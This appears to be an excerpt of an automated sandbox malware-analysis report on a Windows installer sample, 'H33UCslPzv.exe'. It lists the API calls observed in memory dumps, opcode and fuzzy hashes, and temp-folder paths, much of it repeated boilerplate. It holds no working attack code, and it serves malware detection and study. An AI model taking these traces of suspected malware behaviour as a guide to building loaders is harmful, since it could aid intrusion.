                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: a3efc5eb78e3e56d017e2e6455c4acb5d850ed487973469c59e03f22f97d3db8
                                                                  • Instruction ID: 4e90d0d88409270038b8e5dd21ed965c243834f72d7675745fce4010ef402404
                                                                  • Opcode Fuzzy Hash: a3efc5eb78e3e56d017e2e6455c4acb5d850ed487973469c59e03f22f97d3db8
                                                                  • Instruction Fuzzy Hash: 90C09B717407017BFA20CB689D49F077794AB90700F14C4297351F50E5C674D410DA1C
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F89,00042BE4), ref: 0040320E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
                                                                  • Instruction ID: 81fdcbbc46e9ac73494c3809a02cbb86869920566b24394b282a4516d046c7b0
                                                                  • Opcode Fuzzy Hash: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
                                                                  • Instruction Fuzzy Hash: 32B01231140300BFDA214F00DF09F057B21AB90700F10C034B384780F086711075EB0D
                                                                  APIs
                                                                  • SendMessageA.USER32(00000028,?,00000001,00403EE0), ref: 004040BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 346968a0720bb3734bf3dae4b81c014f7857494700bdb546aecc84c256ab8e1e
                                                                  • Instruction ID: f42b45c65ed6a3ee6e87ec929b41dfaaf359f69b17cd9f6c2b1881eba3545dd7
                                                                  • Opcode Fuzzy Hash: 346968a0720bb3734bf3dae4b81c014f7857494700bdb546aecc84c256ab8e1e
                                                                  • Instruction Fuzzy Hash: 64B09235180A00AAEA114B00DE09F457A62A7A4701F008068B250240F1CAB200A1DB08
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,00403E79), ref: 004040A7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: bf910cdad2a26b56ee3b85a0ed98412bb2a8b11df0198d0adf4484009f2821d5
                                                                  • Instruction ID: 939548ffee5b58c9ca03ae204caad8327118cb5bb39276deea9dcfc8bbd505dc
                                                                  • Opcode Fuzzy Hash: bf910cdad2a26b56ee3b85a0ed98412bb2a8b11df0198d0adf4484009f2821d5
                                                                  • Instruction Fuzzy Hash: 65A00176444101AFCA02AF50EF09D4ABF62ABA4705B22843AE695940368A364872FF1D
                                                                  APIs
                                                                  • VirtualAlloc.KERNELBASE(00000000), ref: 70022AF7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1954804177.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                  • Associated: 00000000.00000002.1954777519.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1954823374.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1954905655.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_70020000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 98ccfd1f61e53e26ccdfccc5b97b95d4a9007ade02fe2b514d1ebcd62e4f34d2
                                                                  • Instruction ID: d21092361dcdf761e70d0b83bb978fab9b63b28275ca11d3d3588a519f030466
                                                                  • Opcode Fuzzy Hash: 98ccfd1f61e53e26ccdfccc5b97b95d4a9007ade02fe2b514d1ebcd62e4f34d2
                                                                  • Instruction Fuzzy Hash: F2413B73900204BFEB21DFF5FC82B5D7BB5EB04B36F30452AE60586162C774A8C28A65
                                                                  APIs
                                                                    • Part of subcall function 00405114: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
                                                                    • Part of subcall function 00405114: lstrlenA.KERNEL32(00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
                                                                    • Part of subcall function 00405114: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00403133,00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0), ref: 00405170
                                                                    • Part of subcall function 00405114: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll), ref: 00405182
                                                                    • Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                    • Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                    • Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                    • Part of subcall function 0040568C: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D50,Error launching installer), ref: 004056B5
                                                                    • Part of subcall function 0040568C: CloseHandle.KERNEL32(?), ref: 004056C2
                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00401F8D
                                                                    • Part of subcall function 004063FA: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F43,?,?,?,?,?,?), ref: 0040640B
                                                                    • Part of subcall function 004063FA: GetExitCodeProcess.KERNEL32(?,?), ref: 0040642D
                                                                    • Part of subcall function 00405F4B: wsprintfA.USER32 ref: 00405F58
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                  • String ID:
                                                                  • API String ID: 2972824698-0
                                                                  • Opcode ID: ab329a5fbe1a2bb80e6d7f0c1e62c441a25b0281b2f032684fa4d7b26fa7afa5
                                                                  • Instruction ID: 492013b03639ae684c90f9e5668eb43d68f0c3151a551265a361b9bf3657de6d
                                                                  • Opcode Fuzzy Hash: ab329a5fbe1a2bb80e6d7f0c1e62c441a25b0281b2f032684fa4d7b26fa7afa5
                                                                  • Instruction Fuzzy Hash: 44F09072A04111EBCF11BBA59A859EE72A8DB41318F11017FF901B72D2C37C4A429AAE
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 4a6513538906c2ad888d603f4eec974da145158fa5c322b66a4fc234cd88381b
                                                                  • Instruction ID: 58a32f90f567def110640d9dc390567cb18a6fab0a7cd362fc6929561968ffa9
                                                                  • Opcode Fuzzy Hash: 4a6513538906c2ad888d603f4eec974da145158fa5c322b66a4fc234cd88381b
                                                                  • Instruction Fuzzy Hash: D3D05E73A10201CBD701EBB8AE8485E73B8E7513157204837D542F2191E6B8C9428628
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040455C
                                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404586
                                                                  • SHBrowseForFolderA.SHELL32(?,0079E920,?), ref: 00404637
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404642
                                                                  • lstrcmpiA.KERNEL32(Call,0079F548), ref: 00404674
                                                                  • lstrcatA.KERNEL32(?,Call), ref: 00404680
                                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404692
                                                                    • Part of subcall function 004056ED: GetDlgItemTextA.USER32(?,?,00000400,004046C9), ref: 00405700
                                                                    • Part of subcall function 00406257: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\H33UCslPzv.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
                                                                    • Part of subcall function 00406257: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
                                                                    • Part of subcall function 00406257: CharNextA.USER32(?,"C:\Users\user\Desktop\H33UCslPzv.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
                                                                    • Part of subcall function 00406257: CharPrevA.USER32(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062D1
                                                                  • GetDiskFreeSpaceA.KERNEL32(0079E518,?,?,0000040F,?,0079E518,0079E518,?,00000001,0079E518,?,?,000003FB,?), ref: 00404750
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040476B
                                                                    • Part of subcall function 004048C4: lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
                                                                    • Part of subcall function 004048C4: wsprintfA.USER32 ref: 0040496A
                                                                    • Part of subcall function 004048C4: SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: A$C:\Users\user\AppData\Local\Temp\unscorified$Call
                                                                  • API String ID: 2624150263-1894173936
                                                                  • Opcode ID: 426c689e6bfd3f7724a5f807d599469a9c9a79d675bf4b1419e56df68b0f1dd0
                                                                  • Instruction ID: c53a8e09cffb511e2e8442f8e0ee4109053d5ca2156788ad792cf5210b9728ca
                                                                  • Opcode Fuzzy Hash: 426c689e6bfd3f7724a5f807d599469a9c9a79d675bf4b1419e56df68b0f1dd0
                                                                  • Instruction Fuzzy Hash: F4A17FB1900209ABDB11AFA5CD45AAFB7B8EF85314F14843BF601B62D1D77C8A418F69
                                                                  APIs
                                                                    • Part of subcall function 70021215: GlobalAlloc.KERNEL32(00000040,70021233,?,700212CF,-7002404B,700211AB,-000000A0), ref: 7002121D
                                                                  • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 70021BC4
                                                                  • lstrcpyA.KERNEL32(00000008,?), ref: 70021C0C
                                                                  • lstrcpyA.KERNEL32(00000408,?), ref: 70021C16
                                                                  • GlobalFree.KERNEL32(00000000), ref: 70021C29
                                                                  • GlobalFree.KERNEL32(?), ref: 70021D09
                                                                  • GlobalFree.KERNEL32(?), ref: 70021D0E
                                                                  • GlobalFree.KERNEL32(?), ref: 70021D13
                                                                  • GlobalFree.KERNEL32(00000000), ref: 70021EFA
                                                                  • lstrcpyA.KERNEL32(?,?), ref: 70022098
                                                                  • GetModuleHandleA.KERNEL32(00000008), ref: 70022114
                                                                  • LoadLibraryA.KERNEL32(00000008), ref: 70022125
                                                                  • GetProcAddress.KERNEL32(?,?), ref: 7002217E
                                                                  • lstrlenA.KERNEL32(00000408), ref: 70022198
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1954804177.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                  • Associated: 00000000.00000002.1954777519.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1954823374.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1954905655.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_70020000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                  • String ID:
                                                                  • API String ID: 245916457-0
                                                                  • Opcode ID: ab50ab7eda5e10dc1bf96abc62e307ee394e6c38eaafddfd1b9488961c6addbf
                                                                  • Instruction ID: 6cede08fee887c9c7b3d593f8c330f8c42695dc319edb34ecc5b52c1f8c2ad60
                                                                  • Opcode Fuzzy Hash: ab50ab7eda5e10dc1bf96abc62e307ee394e6c38eaafddfd1b9488961c6addbf
                                                                  • Instruction Fuzzy Hash: 9A22A071D04209EFDB228FB4ED847EDBBFAFB14B26F20452ED196A2281D7745941CB50
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(00408410,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021BA
                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402269
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\unscorified\Pacinian, xrefs: 004021FA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\unscorified\Pacinian
                                                                  • API String ID: 123533781-1480192069
                                                                  • Opcode ID: 8c1491b70ee9da71462547a4ad139fcbd62dd758efc4c42bbf0e79f38f17cd9a
                                                                  • Instruction ID: b20e6ddc0005349e031541e3270fed9150ef90c2934288fc693311ea7f84ec63
                                                                  • Opcode Fuzzy Hash: 8c1491b70ee9da71462547a4ad139fcbd62dd758efc4c42bbf0e79f38f17cd9a
                                                                  • Instruction Fuzzy Hash: 1F511871A00209AFCF00DFE4C988A9D7BB5FF48314F2085AAF515EB2D1DB799941CB54
                                                                  APIs
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402774
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: FileFindFirst
                                                                  • String ID:
                                                                  • API String ID: 1974802433-0
                                                                  • Opcode ID: 7e2d6c76972bccc6bfe42acd4d5d1ed274f309eaf3cef67224d7e78ff27b17ad
                                                                  • Instruction ID: 242f43cfa1d4ef5d1935b54718e26804d33959e399511836c9edd6ef5d071c48
                                                                  • Opcode Fuzzy Hash: 7e2d6c76972bccc6bfe42acd4d5d1ed274f309eaf3cef67224d7e78ff27b17ad
                                                                  • Instruction Fuzzy Hash: 5AF0A0725441009BD701EBB49A49AEEB768AF26324F6041BBE141F21C1D6B889459B6A
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404A97
                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404AA4
                                                                  • GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404AF3
                                                                  • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404B0A
                                                                  • SetWindowLongA.USER32(?,000000FC,00405088), ref: 00404B24
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B36
                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404B4A
                                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404B60
                                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B6C
                                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B7C
                                                                  • DeleteObject.GDI32(00000110), ref: 00404B81
                                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404BAC
